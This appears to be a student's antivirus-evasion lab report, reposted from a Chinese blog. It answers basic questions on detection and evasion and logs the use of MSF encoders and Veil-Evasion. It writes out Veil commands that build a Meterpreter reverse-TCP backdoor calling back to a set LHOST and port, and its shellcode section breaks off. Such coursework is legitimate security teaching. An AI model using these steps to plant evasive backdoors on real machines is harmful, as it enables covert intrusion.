码迷,mamicode.com
首页 > 其他好文 > 详细

20155331 Exp3 免杀原理与实践

时间:2018-04-11 16:00:36      阅读:174      评论:0      收藏:0      [点我收藏+]

标签:org   msf   编码   kali   哪些   命令   基于   地址   别人   

20155331 Exp3 免杀原理与实践

基础问题回答

杀软是如何检测出恶意代码的?

1.基于特征码的检测,2.启发式恶意软件检测,3.基于行为的恶意软件检测。

免杀是做什么?

让病毒不被杀毒软件杀掉。

免杀的基本方法有哪些?

1.改变特征码 2.加壳

实践总结与体会

这次实验让我深入理解了免杀原理,也让我知道了原来以前认为很安全的杀毒软件业并没有那么可靠,因为有很多方法可以实现免杀,给我们的电脑带来风险。

离实战还缺些什么技术或步骤?

实战中不可能那么容易在别人的电脑中植入一个后门程序。

实验的局限性很大。

实践过程记录

一.免杀效果参考基准

把上一次实验用msfvenom生成的后门放入http://www.virscan.org/进行检测
技术分享图片

二.使用MSF编码器

对后门程序进行一次重新编码,再次进行检测
技术分享图片

技术分享图片

我们再将后门程序进行编码十次,然后再检测
技术分享图片

技术分享图片

可见,编码对免杀没啥用。

三.使用veil-evasion生成

启动evail-evasion,设置好回连的IP地址和端口号后,生成后门文件。
命令行中输入veil,
后在veil中输入命令use evasion
技术分享图片
技术分享图片

依次输入如下命令:

use c/meterpreter/rev_tcp.py
技术分享图片

set LHOST 192.168.81.128
set LPORT 5331
技术分享图片
generate
可执行文件的文件名(palyload5331)
技术分享图片
通过命令找到文件
技术分享图片

扫描结果
技术分享图片
技术分享图片

四.利用shellcode编写后门

首先,在Kali上使用命令生成一个c语言格式的Shellcode数组

技术分享图片

20155331 Exp3 免杀原理与实践

标签:org   msf   编码   kali   哪些   命令   基于   地址   别人   

原文地址:https://www.cnblogs.com/dd1174751354/p/8794452.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!